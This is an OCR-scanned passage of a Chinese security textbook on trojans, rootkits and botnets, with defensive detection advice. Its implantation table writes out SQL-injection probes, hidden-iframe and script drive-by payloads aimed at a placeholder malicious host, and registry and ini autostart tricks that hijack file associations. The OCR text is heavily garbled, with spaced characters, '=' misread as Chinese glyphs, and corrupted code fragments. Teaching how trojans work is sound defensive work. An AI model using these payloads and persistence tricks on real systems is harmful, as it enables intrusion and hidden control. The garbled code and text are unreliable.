(2) 合并 程序 欺骗 。 合 并 程序 是 可 以 将 两 个 或 两 个 以 上 的 可 执行 exe 文件 结合 为 一 个 
文件 ,以 后 只 需 执行 这 个 合并 文件 ,两 个 可 执行 文件 就 会 同时 执行 。 

(3) 捆绑 欺骗 。 利 用 EXE 捆绑 机 如 Wrappers、binders 和 EXE binders 等 工具 ,或 压缩 
软件 如 WinRar 制作 成 自 释放 文件 ,如 WinRMSetup30. exe。 

(4) 文件 内 部 插入 欺骗 。 利 用 运行 flash 文件 和 影视 文件 具有 可 以 执行 脚本 文件 的 特 
性 ,使 用 * 插 马 ? 工 具 将 脚本 文件 插入 到 swf ,rm 等 类 型 的 播放 文件 中 ;或 在 Word 文档 末尾 
加 入 木马 文件 。 

(5) 扩展 组 件 伪装 欺骗 。 黑 客 们 通常 将 木马 程序 伪装 成 为 扩展 组 件 文件 ,然后 挂 在 一 
个 常用 的 应 用 程序 软件 中 。 

(6) 运行 欺骗。 打开 木马 时 伪装 出 错 提示 或 广告 ( 没 反应 可 能 被 怀疑 ) 。 

(7) 寄生 欺骗 。 一 般 寄生 在 C:\windows 或 者 是 C:\windows\system 目录 下 ,比较 容 
易 发 现 。 改 变 木马 常规 寄生 路 径 或 木马 更 名 为 和 系统 文件 名 相近 似 的 名 字 。 

(8) 进程 注 和 欺骗。 注入 到 内 核 , 关 键 进程 ,以 系统 或 关键 进程 的 名 义 访问 网 络 或 跟随 
访问 。 

(9) 网 络 下 载 欺 骗 。 木 马 伴随 正常 共享 软件 下 载 , 或 伪装 成 正常 软件 下 载 ,或 者 发 布 的 
共享 软件 本 身 带 毒 ,原因 是 黑客 修改 后 二 次 发 布 .发布 前 内 部 员工 注入 恶意 代码 ,软件 开发 
的 全 球 化 趋势 使 外 包 软 件 不 安全 或 可 信和 度 低 。 

防御 措施 是 只 下 载 真 正 需 要 的 软件 ,下 载 后 小 心 试用 检测 ,完整 性 检测 (如 MD5) 是 否 
被 恶意 修改 过 。 

3, 木马 植 入 技术 

木马 植 人 技术 分 为 主动 植 人 与 被 动 植 人 两 类 。 常 用 的 植 人 攻击 方法 如 表 2. 4 所 示 。 


表 2.4 木马 常用 植 入 攻击 方法 


攻击 方式 攻击 方法 
注入 注入 点 asp?id 二 x, 在 网 站 的 后 面 加 上 and 1==1 和 and1=2 进行 逻辑 爆破 数据 库 
路 站 在 输入 框 输入 二 SCRIPT language 二 JavaScript scr 一 "http://xxx. exe" type 一 text/ 


javascript defer 志 就 会 下 载 xxx. exe 等 
旁 注 通过 公用 一 台 服 务 器 的 特点 ,取得 服务 器 权限 ,控制 服务 器 上 的 其 他 网 站 


在 网 页 中 插入 过 iframe src 王 http://www. xxx. com 或 者 /xx. exe width 一 "0”height 一 


html 挂 马 "0" 二 过 /iframe 祖 ,其 中 http://www. xxx. com 就 是 恶意 的 网 站 
js 挂 马 在 .js 文件 中 写 人 代码 docment write("<iframewidth 二 "0" height 二 "0" src=http:// 
www. xxx. com 记 过/iframe 记 过 /script 请 ), 其 中 http://www. xxx. com 是 恶意 网 站 
f 排 马 在 xxx. swf 中 的 getURL("http://www. xxx. com"，blank) 添 加 http:/ www. xxx. com 
swf 挂 马 
恶意 连接 地 址 

ss 挂 马 Hytop:e-xpression( top. document. body. interHTML = top. docment. body. interHTML 
ee +<iframe src= "http://www. xxx. com">< /iframe> 
软件 漏洞 挂 马 if(new ActiveXObject ("Baidubar. Tool. 1")) docment. write( '< iframe src= "http:// 


www. xxx. cn/img/baidu. gif" 盖 二 /iframe> 0) 百度 溢出 漏洞 代码 等 很 多 


主动 植 人 就 是 攻击 者 利用 网 络 攻击 技术 主动 将 木马 程序 植 人 到 远程 目标 主机 。 主 要 包 
括 利 用 系统 自身 漏洞 或 第 三 方 软件 漏洞 植 人 、 攻 击 者 利用 系统 的 安全 特性 主动 植 人 、 利 用 即 
时 通信 软件 发 送 伪装 的 木马 文件 植 入 、 利 用 电子 邮件 发 送 木 马 植 入 。 

被 动 植 人 是 指 攻 击 者 预先 设置 某 种 环境 ,然后 被 动 等 待 目标 系统 用 户 的 某 种 可 能 操作 ， 
只 有 执行 这 种 操作 ,木马 程序 才 有 可 能 植 人 目标 系统 。 被 动 植 人 包括 : 

(1) 软件 下 载 。 一 些 非 正规 的 网 站 以 提供 软件 下 载 为 名 义 , 将 木马 捆绑 在 软件 安装 程 
序 上 ,下 载 后 只 要 一 运行 这 些 程序 ,木马 就 会 自动 安装 。 

(2) 局 域 网 共享 。 利 用 局 域 网 的 硬盘 或 文件 夹 共享 ,木马 文件 被 共享 传播 。 

(3) 自动 播放 设备 。 利 用 设备 上 的 Autorun 文件 自动 运行 的 特性 ,主要 通过 U 盘 或 移 
动 硬盘 植 人 。 

(4) 网 页 浏览 ( 挂 马 ) 传 播 。 利 用 浏览 器 在 执行 Script 脚本 时 存在 的 一 些 漏洞 ,或 利用 
Script/ActiveX 控件 .Asp. CGI 交互 脚本 JavaApplet 等 技术 , 当 浏 览 Web 网 页 时 会 在 后 台 
将 木马 程序 下 载 到 计算 机 缓存 中 ,然后 修改 系统 注册 表 , 使 相关 键 值 指向 木马 程序 。 

4. 木马 自动 加 载 技 术 

木马 自动 加 载 技术 包括 修改 系统 文件 .系统 注册 表 、 文 件 打开 关联 、 任 务 计 划 、 组 策略 
等 ,或 者 替换 系统 自动 运行 的 文件 .系统 的 DLL, 或 者 配置 为 系统 服务 启动 ,或 者 利用 注入 
伴随 应 用 程序 启动 .跟随 用 户 常 用 软件 (如 IE、FTP、 即 时 通信 ) 启 动 ,或 者 修改 Windows 系 
统 文件 和 注册 表 , 随 系统 自 启动 。 主 要 技术 如 下 : 

(1) 在 Win. ini 中 启动 。Win. ini 控制 Windows 用 户 窗口 环境 的 概貌 ,如 窗口 边界 宽 
度 、 系 统 字 体 等 。 在 [windows] 字 段 中 添加 run=c:\windows\ 木 马 . exe, 在 默认 状态 下 运 
行 木马 ;load 二 c:\windows\ 木 马 . exe, 在 后 台 运 行 (最 小 化 ) 。 

(2) 在 System. ini 中 启动 。System. ini 包含 Windows 初始 配置 信息 的 重要 文件 ,其 
[boot] 字段 中 加 入 shell 二 Explorer. exe 木马 . exe; [386Enh] 字段 : driver 王 路 径 \ 程 序 名 ; 
[Lmicj、Ldrivers]、Ldrivers32]: 可 能 是 . sys 的 驱动 伪装 、 mid 的 音频 伪装 等 木马 。 

(3) 在 Winstart. bat 中 启动 。Winstart. bat 批 处 理 新 装 软件 设置 冲突 的 后 续 处 理 , 添 
加 一 行 命令 “木马 . exe”, 可 启动 木马 。 


地 启动 木马 。 

(5) 在 Autoexec. bat 和 Config. sys 中 加 载运 行 。 

(6) 在 应 用 程序 的 启动 配置 文件 *. INI 中 被 动 伴随 加 载 。 

(7) 捆绑 文件 加 载 。 将 系统 程序 捆绑 木马 ,运行 捆绑 文件 的 同时 加 载 并 生成 木马 。 

(8) 注册 表 加 载 。 修 改 注 册 表 的 Local _Machine 和 Current_User 的 \ SoftWare \ 
Microsoft \ Windows \ Current Version\ 下 的 所 有 run 有 关 的 子 键 ,以 及 \ SoftWare \ 
Microsoft \ Windows NT \ CurrentVersion \ 键 名 为 load 的 字符 型 数据 设置 为 加 载 木马 ， 
在 local_machine\software\microsoft\windows\currentversion 建立 RunServices 子 键 来 实 
现 自 启动 服务 。run 是 系统 启动 后 加 载 ,runservices 是 系统 登录 时 就 启动 。 

(9) 启动 组 加 载 。 启 动 组 的 文件 夹 为 C:\Windows\start menu\programs\startup, 在 
其 中 加 入 木马 连接 . Ink; 在 注册 表 中 是 HKEY_CURRENT_USER\Software\ Microsoft\ 


windows\ CurrentVersion\ Explorer\ shell Folders Startup="c:\windows\start menu\ 
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programs\startup" 。 

(10) 打开 关联 文件 加 载 。 通 过 修改 HKEY_C\shell\open\command 主键 的 键 值 为 木 
马 来 打 开 相 关 文 件 。 例 如 “冰河 ”修改 HKEY_CLASSES_ROOTANtxtfile \ shell\open\ 
command 下 的 键 值 ,将 C:\ WINDOWS\ NOTEPAD. EXE% 1 改 为 C:\ WINDOWS\ 
SYSTEM\SYSEXPLR. EXE %1, 以 后 双击 某 TXT 文件 将 启动 木马 。 同 理 ,可 设置 关联 打 
开 . doc/. zip/. rar/. exe/. html 等 文件 。 

5. 木马 隐藏 技术 

木马 隐藏 技术 主要 分 为 主机 隐藏 和 通信 隐藏 两 类 。 

主机 隐藏 主要 指 在 主机 系统 表现 为 正常 的 进程 ,主要 有 文件 隐藏 .进程 隐藏 等 。 

文件 隐藏 主要 采用 欺骗 的 方式 伪装 成 系统 文件 或 其 他 文件 。 进 程 隐藏 主要 采用 动态 链 
接 库 注入 技术 ,将 “木马 ”程序 做 成 一 个 动态 链接 库 文件 ,并 将 调用 动态 链接 库 函 数 的 语句 插 
人 到 目标 进程 ;也 可 以 采用 Hooking API 技术 ,修改 API 函数 的 入 口 地 址 的 方法 来 欺骗 试 
图 列举 本 地 所 有 进程 的 程序 ,IE 浏览 器 iexplore. exe 是 注入 隐藏 最 多 的 ;还 可 以 采用 服务 
隐藏 ,将 木马 程序 配置 为 “系统 服务 ”, 任 务 管理 器 将 看 不 到 木马 进程 。 

通信 隐藏 主要 包括 通信 端口 隐藏 和 内 容 隐 藏 ,采用 以 下 技术 : 

(1) 复 用 正常 服务 端口 。 直 接 绑 定 到 正常 用 户 进程 的 端口 ,接收 数据 后 ,根据 包 格 式 判 
断 是 不 是 自己 的 ,如 果 是 自己 处 理 , 不 是 通过 127. 0. 0. 1 的 地 址 交 给 真正 的 服务 器 应 用 进行 
处 理 , 以 利用 正常 的 网 络 连接 隐藏 木马 的 通信 状态 。 

(2) 无 端口 通信 。 如 采用 ICMP 协议 ,主要 缺点 是 防火 墙 可 能 把 所 有 ICMP 协议 的 信 
息 过 滤 掉 。 

(3) 自动 端口 。 自 动 查找 系统 不 用 的 端口 使 用 ,一 般 是 采用 1024 以 上 的 ,并 可 随机 改 
变 防 扫描 。 一 台 机 器 有 65 536 个 端口 ,1024 以 下 端口 为 系统 常用 端口 。 

(4) 反弹 连接 正常 端口 。 木 马 程序 启动 后 主动 通过 正常 的 端口 (如 80 端口 ) 连 接客 
户 端 。 

(5) 利用 嗅 探 或 全 状态 数据 包 检 测 SPI 防火 墙 技术 隐藏 内 容 。 

其 他 木马 的 隐藏 技术 有 : 

(1) 设计 隐藏 。 设 计时 将 木马 程序 Form 的 Visible 属性 设 为 False, ShownTaskBar 设 
为 False, 程 序 运行 窗口 被 隐藏 。 

(2) 加 载 隐 藏 。 伪 装 系统 启动 加 载 ; 系统 进程 加 载 ;浏览 器 脚本 加 载 (Java Script、 
VBScript、ActiveX、XLM 浏览 器 新 功能 ) ;常用 应 用 加 载 ( 更 新 器 .帮助 器 ) 。 

(3) 综合 隐藏 。 综 合 利用 文件 .进程 和 端口 通信 的 隐藏 技术 ,采用 软件 中 文 汉化 的 陷阱 
技术 ,通过 修改 虚拟 设备 驱动 程序 (VXD) 或 修改 动态 链接 库 (DLL) 来 加 载 木马 ;摆脱 原 有 
的 端口 监听 模式 ,而 采用 替代 系统 功能 的 方法 (改写 . vxd 或 . dll 文件 ) ,将 修改 后 的 DLL 替 
换 系 统 的 相应 DLL, 并 对 所 有 的 函数 调用 进行 过 滤 。 没 有 增加 新 的 文件 ,不 需要 打开 新 的 
端口 ,没有 新 的 进程 ,使 用 常规 的 方法 监测 不 到 它 。 对 于 常规 的 调用 ,使 用 函数 转发 器 直接 
转发 给 被 蔡 换 的 系统 DLL 函数 ,一 旦 发 现 控制 端的 请 求 就 激活 自身 ,在 绑 定 的 进程 上 进行 
正常 的 木马 操作 。 

6. 木马 的 连接 技术 

木马 的 连接 技术 主要 有 主动 正 向 连接 .反弹 连接 .HTTP 隧道 和 跟随 连接 等 。 
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(1) 主动 连接 ( 正 向 连接 )。 基 于 TCP/IP 的 连接 ,服务 端 在 运行 后 监听 指定 端口 ,而 在 
连接 时 客户 端 会 主动 发 送 连接 命令 给 服务 端 进 行 连 接 。 缺 点 是 在 连接 的 时 候 可 以 轻易 地 被 
防火 墙 所 拦截 ,如 冰河 。 

(2) 反弹 连接 。 为 防止 防火 墙 阻 断 外 部 可 疑 连接 ,木马 服务 端 (被 控制 端 ) 主动 与 客户 端 
(控制 端 ) 建 立 连接 ,监听 端口 一 般 为 80。 分 为 直接 反弹 连接 (方式 1) 和 代理 反弹 连接 (方式 
2) ,代理 反弹 又 分 为 FTP 反弹 连接 和 域名 反弹 连接 。 典 型 代表 就 是 灰 蚀 子 .网 络 神偷 。 

Q@ 直接 反弹 。 连 接 需 服务 端 预先 知道 客户 端的 IP 和 端口 (预先 配置 ) ,不 适合 动态 IP 
入 侵 , 如 图 2.11 所 示 。 


客户 端 开放 端口 远程 主机 主动 寻找 
等 待 服务 端的 连接 客户 端 建立 连接 
， | 客户 端 要 求 建立 连接 远程 主机 
第 一 步 (Client) (Server) 
_ ,| 客户 端 连接 建立 成 功 远程 主机 
第 二 步 (Client) (Server) 
图 2.11 反弹 连接 


@ 代理 反弹 之 一 ,FTP 反弹 连接 。 客 户 端 首 先 登 录 FTP 空间 ,在 相关 网 页 上 写 入 客户 
端 计算 机 目前 IP 及 开放 端口 。 而 服务 端 会 定时 读 取 FTP 空间 网 页 内 容 , 当 发 现 客户 端 信 
息 就 会 主动 连接 远程 服务 端 ,如 图 2. 12 所 示 。 


FTP 服 务 器 


1. 设置 客户 端 2. 获取 客户 端 
的 IP 和 端口 JP 和 端口 


3. 通过 获取 IP 和 


客户 端 端口 进行 连接 防火 寺 服务 端 
(黑客 控制 ) (被 种 马 机 ) 


图 2.12 FTP 反 弹 连 接 


@ 代理 反弹 之 二 ,域名 反弹 连接 。 原 理 同 FTP 反弹 连接 类 似 。 客 户 控制 端 更 新 域名 
信息 ,服务 端 通过 域名 读 取 客户 端 信息 ,然后 主动 连接 客户 端 ,如 图 2. 13 所 示 。 


域名 空间 
设置 客户 端 P 和 端口 

获取 客户 端 

正和 端口 通过 获取 的 IP 
天 和 端口 主动 连接 客户 端 
网 关 一 一 一 | (黑客 控制 

或 防火 墙 
木马 服务 器 


(被 种 马 机 ) | | 其 他 主机 其 他 主机 


图 2.13 域名 反弹 连接 
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(3) HTTP 隧道 技术 。 将 传送 的 数据 封装 在 HTTP 协议 里 进行 传送 ,可 以 访问 到 局 域 
网 里 通过 HTTP、SOCKS4/5 代理 上 网 的 服务 端 。 代 表 木 马 有 红 狼 (Gh0st RAT)。 

(4) 其 他 连接 技术 。B/S 型 木马 通过 浏览 器 (Browser) 对 服务 端 (Server) 进 行 连接 控 
制 操 作 ,如 BO2000、 网 络 精灵 。 进 程 注入 跟随 连接 ,如 广 外 幽灵 。 

从 连接 原理 来 讲 , 不 论 是 服务 端 还 是 客户 端 都 需要 “暴露 ?在 Internet 中 , 即 都 需要 有 独 
立 的 IP 地 址 。 如 果 有 一 方 在 局 域 网 是 非 独 立 IP, 则 客户 端 在 局 域 网 主动 连接 不 可 用 ;服务 
端 在 局 域 网 反弹 连接 不 可 用 。 双 方 在 同一 局 域 网 则 DNS 反弹 连接 不 可 用 ,不 在 同一 局 域 网 
则 都 不 可 用 。 

7. 远程 控制 

远程 控制 包括 发 现 目标 和 远程 连接 访问 。 发 现 目标 采用 端口 扫描 、 邮 件 、.UDP 通知 、 
QQ 或 MSN 等 即时 通信 软件 获得 中 了 木马 的 目标 主机 上 线 (网 络 存 活 ) 信 息 ,包括 IP 和 
端口 。 一 旦 发 现 则 添加 到 客户 端 控制 程序 的 木马 主机 列表 。 如 网 络 公 牛 采用 邮件 发 送 
获得 植 人 主机 的 IP; 网 络 神偷 自动 读 取 植 人 者 主页 空间 文件 中 的 IP 信 息 ,用 UDP 通知 
连接 。 

连接 成 功 后 一 般 可 以 像 操作 本 地 机 器 一 样 访问 远程 计算 机 。 


2.5.3 木马 的 防御 


机 器 如 有 异常 状况 ,如 浏览 器 自动 打开 一 个 网 站 ,或 弹出 一 些 广告 窗口 ;正常 操作 时 突 

然 弹 出 警告 框 或 询问 框 ;系统 配置 莫名 其 妙 地 被 自动 更 改 , 如 屏保 显示 的 文字 、 时 间 和 日 期 、 
音 大 小 、 鼠 标 灵 敏 度 、CD-ROM 的 自动 运行 .鼠标 在 屏幕 上 异常 变动 或 移动 进程 数量 异 

常 多 ,内 存 或 CPU 占用 率 大 等 ,都 有 中 木马 病毒 可 能 。 

1. 使 用 工具 查 杀 木马 

首选 木马 查 杀 工具 查 杀 ,如 木马 防线 ,木马 克星 Iparmor 和 360 安全 卫士 等 。 使 用 进程 
端口 查看 工具 ,扫描 端口 .检查 系统 进程 如 Fport、Pskill、icesword 和 tcpview 等 工具 。 通 过 
防火 墙 来 监控 异常 访问 和 流量 监测 。 

2. 手工 检测 木马 

大 部 分 的 木马 服务 器 端 会 在 系统 中 监听 某 个 端口 ,有 的 在 运行 期 间 会 在 系统 中 生成 进 
程 ,或 者 隐藏 配置 在 ini 文件 .注册 表 和 服务 等 自 启动 项 ,或 者 有 异常 通信 和 流量 ,因此 可 以 
通过 检查 这 些 情 况 发 现 木马 踪迹 。 

手工 使 用 netstat -a 命令 查看 发 现 所 有 网 络 连接 ;检查 系统 进程 ,如 利用 进程 管理 或 专 
用 软件 来 查看 进程 ,如 果 发 现 可 疑 进程 就 结束 它 ; 端 口 扫 描 检 查 对 于 驱动 程序 /动态 链接 木 
马 不 起 作用 ;检查 注册 表 相 关 位 置 ;查找 文件 ,用 “系统 文件 检查 器 ”可 检测 操作 系统 文件 的 
完整 性 和 还 原 。 最 可 疑 的 位 置 如 下 : 

(1) Win. ini 文件 的 [Lwindowsj] 节 中 run 二 和 load 二 位 置 。 

(2) system. ini 文件 的 [bootj] 节 的 shell 二 explorer. exe 位 置 。 

(3) Autoexec. bat 文件 的 可 疑 win 命令 。 

(4) 注册 表 中 : 

HKEY _Local Machine\software\microsoft\windows\currentversion\run 位 置 ; 

HKEY_CURRENT _USER \software\microsoft\ windows\ currentversion \ runonce 


位 置 ; 
HKEY_CLASSES_ROOT\exefile\shell\open\command" %1" %* 位 置 ; 
HKEY_CURRENT_USER\control panel\desktop\wallpaper 位 置 。 


2.5.4 木马 举例 


1. 灰 镶 子 

客户 端 主要 文件 为 H_Client. exe, 服 务 器 端 文件 的 默认 名 为 G_Server. exe。 从 体内 释 
放 G_Server. dl1.G_Server_Hook. dll 和 G_ServerKey. dll( 用 来 记录 键盘 操作 ) 到 windows 
目录 ,将 dll 文件 注入 到 Explorer. exe、IExplorer. exe 或 者 所 有 进程 中 执行 ,然后 G_Server. 
exe 退出 (完成 激活 )。 反 弹 端口 型 ,没有 独立 进程 ,隐藏 性 很 好 。 

2. Radmin 

控制 端 包含 radmin. exe, 服 务 端 包含 r_server. exe\AdmDll. dl 和 raddrv. dll。 

3. 冰河 

冰河 是 一 款 基 于 TCP/IP 协议 的 经 典 教学 木马 。 客 户 控制 端 G_Cilent. exe、Operate. 
ini, 服 务 端 程序 配置 ,运行 G_Server. exe 后 生成 sysexplr. exe 和 kernel32. exe。 

4. 广 外 男生 

服务 端 是 gwboy. exe、gwboydll. dll。 


2.6 ”特殊 后 门 与 僵尸 网 络 


2.6.1 Rootkit 后 门 


操作 系统 是 由 内 核 (Kernel) 和 外 壳 (Shell) 两 部 分 组 成 的 ,内 核 负 责 一 切实 际 的 工作 ， 
包括 CPU 任务 调度 ,内存 分 配 管理 .设备 管理 和 文件 操作 等 ;外 壳 是 基于 内 核 提供 的 交互 
功能 而 存在 的 界面 , 它 负责 指令 传递 和 解释 。 

Rootkit 源 于 UNIX 系统 中 的 超级 用 户 账 号 ,后 引入 Windows 等 多 种 操作 系统 。 
Rootkit 后 门 工具 通过 修改 现 有 的 操作 系统 软件 ,使 攻击 者 获得 访问 权 并 隐藏 在 计算 机 中 ， 
其 包括 多 种 掩饰 攻击 者 在 系统 中 存在 的 功能 ,如 进程 .文件 .注册 表 、 服 务 和 端口 等 隐藏 。 

Rootkit 后 门 按照 内 核 模式 分 为 用 户 级 和 内 核 级 ,用 户 级 Rootkit 不 深入 系统 内 核 , 通 
常 在 用 户 层 进行 相关 操作 ;内 核 级 Rootkit 深入 系统 内 核 , 改 变 系统 内 核 数据 结构 ,控制 内 
核 本 身 。 普 通 后 门 和 Rootkit 的 工作 模式 如 图 2. 14 所 示 。 

1.， Rootkit 后 门 组 成 

一 个 典型 的 Rootkit 后 门 包括 : 

(1) 以 太 网 嗅 探 器 程序 ,用 于 获得 网 络 上 传输 的 用 户 名 和 密码 等 信息 。 

(2) 特洛伊 木马 程序 ,例如 inetd 或 者 login ,为 攻击 者 提供 后 门 。 

(3) 隐藏 攻击 者 的 目录 和 进程 的 程序 ,例如 ps netstat rshd 和 1s 等 。 

(4) 可 能 还 包括 一 些 日 志清 理工 具 , 例 如 zap .zap2 或 者 z2 ,攻击 者 使 用 这 些 清 理工 具 
删除 wtmp .utmp 和 lastlog 等 日 志文 件 中 有 关 自 己 行踪 的 条 目 。 
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获得 Ring 3 运行 级 别 获得 Ring 0 运行 级 别 
外 过 木马 服务 器 外 这 
ZN 
Ring 3 进程 API 列 出 木马 客户 端 信息 Ring3 | | 进程 API 少 了 Rootkit 信 息 
Ring0 Ring0 
内 核 内 核 Rootkit 


图 2.14 普通 木马 后 门 和 Rootkit 后门 的 工作 模式 


(5) 一 些 复杂 的 rootkit 还 可 以 向 攻击 者 提供 telnet、shell 和 finger 等 服务 。 

(6) 还 包括 一 些 用 来 清理 /var/log 和 /var/adm 目录 中 其 他 文件 的 脚本 。 

2. 用 户 模式 Rootkit 

用 户 模式 Rootkit 控制 操作 系统 的 关键 性 可 执行 程序 ,而 不 是 内 核 。 

UNIX 的 用 户 模式 Rootkit 能 提供 后 门 访 问 的 二 进 制 蔡 换 程 序 、 隐 藏 攻击 者 的 二 进 制 
替换 程序 .用 于 隐藏 但 不 替换 二 进 制程 序 的 其 他 工具 ,安装 脚本 等 。 最 流行 的 是 LRK 家 族 
和 URK 家 族 的 Rootkit 。 

Windows 的 用 户 模式 Rootkit 使 用 现 有 接口 在 现 有 Windows 函数 之 间 注 入 恶意 代码 ， 
如 FakeGINA ;关闭 Windows 文件 保护 机 制 WFP( 如 系统 文件 检测 器 SFC) ,然后 覆盖 硬盘 
上 的 文件 ;利用 DLL 注入 和 API 挂钩 操纵 正在 内 存 中 运行 的 进程 。 

3. 内 核 模式 Rootkit 

内 核 模式 Rootkit 修改 现 有 操作 系统 的 内 核 本 身 , 获 得 计算 机 的 访问 权 并 潜伏 在 其 中 。 
比 用 户 模 式 Rootkit 更 彻底 、 更 高 效 。 

Windows 内 核 运 行 于 Ring 0 级 别 , 拥 有 最 完全 ,最 底层 的 管理 功能 。Windows 外 壳 只 
能 拥有 Ring 3 级 别 , 操 作 功 能 极 少 ,几乎 所 有 指令 都 需要 传递 给 内 核 来 决定 能 否 执行 。 

大 多 数 内 核 模式 Rootkit 采用 以 下 手段 : 文件 和 目录 隐藏 .进程 .服务 .注册 表 隐 藏 、 网 
络 端口 隐藏 .混合 模式 隐藏 (隐藏 网 络 接口 混合 状态 ) .执行 改变 方向 .设备 截取 和 控制 (如 底 
层 键盘 截获 ) 。 

4. 防御 Rootkit 

防御 Rootkit 需要 定期 加 强 配置 和 修复 系统 补丁 ,使 得 攻击 者 不 能 获得 管理 员 和 系统 
权限 ;安装 防 病毒 软件 防火墙 .人 侵 防 御 系 统 IPS; 使 用 文件 完整 性 检验 工具 ,如 Fcheck、 
Tripwire 商业 版 ;使 用 Rootkit 检测 工具 如 IceSword RootkitRevealer。 如 果 发 现 Rootkit 
已 进入 系统 ,最 好 重建 系统 ,并 小 心 应 用 补丁 程序 。 

Linux 下 的 Rootkit 检测 工具 有 PKDS、RKhunter 和 SBCFI 等 ,如 表 2.5 所 示 。 


表 2.5 ”Rootkit 与 Linux 内 核 ,检测 工具 对 照 表 


Rootkit 名 称 Linux 内 核 Rootkit 隐藏 功能 检查 工具 情况 
用 站 进程 | 连接 | 模块 | RKDS | rkhunter| SBCFI 
adore-0. 42 2.4 是 是 是 NA x ~ 
adore-ng-0. 56 2.6 是 是 Jv x NN/ 
knark-2. 4. 3 2.4 是 是 是 NA V/ NA 
wnps-0. 26 2.6 是 是 JV x N/A 
eyelkm-1.1.2 2.6 是 否 是 NA x N/A 
yl3rk-1.0 2.6 是 否 是 JV x N/A 
hp-1.0.0 2.4 是 否 否 NA x x 
modhide-1.0 2.4 否 否 是 V > Vv 
2.6.2 僵尸 网 络 


僵尸 (Bot) 是 一 种 攻击 者 通过 网 络 传播 的 木马 程序 ,良性 Bot 是 防止 频道 被 滥用 ,管理 
权限 .记录 频道 事件 等 一 系列 服务 功能 的 智能 化 管理 程序 。 

僵尸 网 络 (Botnet) 是 僵尸 主人 ( 称 为 Botmaster) 出 于 恶意 目的 ,传播 僵尸 程序 控制 大 量 
主机 ,并 通过 一 对 多 的 命令 与 控制 信道 所 组 成 的 网 络 , 并 融合 了 网 络 蠕虫 .特洛伊 木马 和 后 
门 工具 等 传统 恶意 代码 技术 。 

一 个 僵尸 网 络 由 僵尸 主机 (Zombie) 和 僵尸 网 络 控制 服务 器 两 部 分 组 成 。 僵 尸 置 于 僵 
尸 主机 ,能 够 按照 预定 义 的 指令 执行 操作 ,是 具有 一 定 智能 的 程序 ;僵尸 网 络 控制 服务 器 可 
以 将 僵尸 主机 连接 到 IRC(Internet Relay Chat ,互联 网 中 继 聊天 协议 ) 服 务 器 ,控制 者 通过 
该 服务 器 向 僵尸 主机 发 送 命令 进行 控制 ,如 图 2. 15 所 示 。 


Bot 


僵尸 网 络 
控制 服务 器 


僵尸 主机 


图 2.15 僵尸 网 络 
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1. Botnet 的 工作 原理 

1) 传播 过 程 

Q@ 利用 漏洞 主动 攻击 系统 ,获得 访问 权 和 Shell, 执 行 僵尸 程序 注入 代码 ,将 僵尸 程序 
植 人 受害 主机 。 

@ 利用 邮件 。 在 邮件 附件 中 携带 僵尸 程序 或 者 包含 下 载 链接 ,并 通过 一 系列 社会 工程 
学 的 技巧 诱 使 接收 者 下 载 并 执行 僵尸 程序 。 

@ 利用 即时 通信 软件 如 QQ, 查 询 好 友 列 表 发 送 执行 僵尸 程序 的 链接 。 

@ 恶意 网 站 脚本 。 在 Web 页 面 上 绑 定 僵尸 程序 的 恶意 脚本 , 诱 使 访问 者 浏览 时 单 击 
下 载 到 主机 上 执行 。 

@ 伪装 成 有 用 的 免费 共享 软件 ,提供 在 Web 网 站 .FTP 服务 器 .P2P 网 络 中 诱骗 用 户 
下 载 并 执行 。 

以 Slapper 利用 漏洞 为 例 。@ 用 非法 的 GET 请 求 包 扫 描 相 邻 网 段 的 主机 ,希望 获得 主 
机 的 指纹 (操作 系统 版 本 、Web 服务 器 版 本 ) 。@ 一 旦 发 现 有 Apache SSL 缓存 溢出 漏洞 的 
主机 ,就 开始 发 动 攻击 。 攻 击 者 首先 在 建立 SSL v2 连接 时 故意 放 一 个 过 大 参数 ,代码 没有 
对 参数 做 边界 检查 ,并 复制 该 参数 到 一 个 堆 定位 的 SSL_SESSION 数据 结构 中 的 固定 长 度 
缓冲 区 ,造成 缓冲 区 溢出 。 手 工 制 作 的 字段 是 缓存 溢出 的 关键 ,漏洞 探测 者 小 心 翼 翼 地 覆盖 
这 些 数据 域 , 不 会 严重 地 影响 SSL 握手 。 

2) 感染 过 程 

攻击 程序 在 攻陷 主机 后 ,随即 植 和 人 Bot 程序 或 让 被 攻陷 的 主机 自己 去 指定 的 地 方 下 载 。 
这 种 从 指定 地 方 下 载 的 过 程 称 为 二 次 注入 ,二 次 注入 是 为 方便 攻击 者 随时 更 新 Bot 程序 ,不 
断 增加 新 功能 ,同时 不 断 改变 的 代码 特征 也 增加 了 跟踪 的 难度 。 

Bot 程序 植 人 时 会 自动 脱 壳 , 在 被 感染 主机 上 执行 IRC 客户 端 程序 。Bot 主机 从 指定 
的 服务 器 上 读 取 配置 文件 并 导入 恶意 代码 ,Bot 程序 隐藏 IRC 界面 .修改 Windows 注册 表 
的 自 启动 部 分 。 

Bot 程序 关闭 某 些 特定 程序 (Bootstrap Process) ,防火 墙 ,系统 自动 更 新 。 

3) 加 入 Botnet 

加 入 Botnet 过 程 就 是 IRC 客户 端 程序 连接 服务 端的 过 程 。 不 同类 型 的 Bot 主机 ,加 入 
Botnet 的 方式 也 不 同 ,基于 IRC 协议 的 Bot 主机 加 入 Botnet 的 过 程 是 : 

@ 如 果 Bot 中 有 域名 , 先 解析 域名 ,通常 采用 动态 域名 。 

@ Bot 主机 与 IRC 服务 器 建立 TCP 连接 。 如 果 IRC 服务 器 设置 了 连接 密码 ,在 TCP 
三 次 握手 后 通过 PASS 命令 发 送 。 

@ Bot 主机 与 IRC 服务 器 发 送 NICK 和 USER 命令 ,NICK 通常 有 一 个 固定 的 前 级 ， 
如 CHN12345、LNtj 一 15120, 前 级 通常 为 国家 简称 、 操 作 系 统 版 本 等 。 

@ 加 入 预定 义 的 频道 。 频 道 名 一 般 硬 编码 在 Bot 体内 ,有 的 控制 者 为 频道 设 定 了 


密码 。 

4) 控制 方式 

Botnet 的 主人 必须 保持 对 僵尸 主机 的 控制 ,才能 利用 它们 完成 预订 的 任务 目标 。 以 
IRC Bot 为 例 : 


@ 攻击 者 或 者 是 Botnet 的 主人 建立 控制 主机 (Server) ,大 多 数 建立 在 公共 的 IRC 服务 


上 ,少数 是 攻击 者 自己 单独 建立 的 。 

@ Bot 主机 主动 连接 IRC 服务 器 ,加 入 到 某 个 特定 频道 。 

@ 控制 者 (黑客 ) 主 机 也 连接 到 IRC 服务 器 的 这 个 频道 上 。 

@ 控制 者 (黑客 ) 使 用 login、logon 和 auth 等 命令 认证 自己 ,服务 器 将 该 信息 转发 给 频 

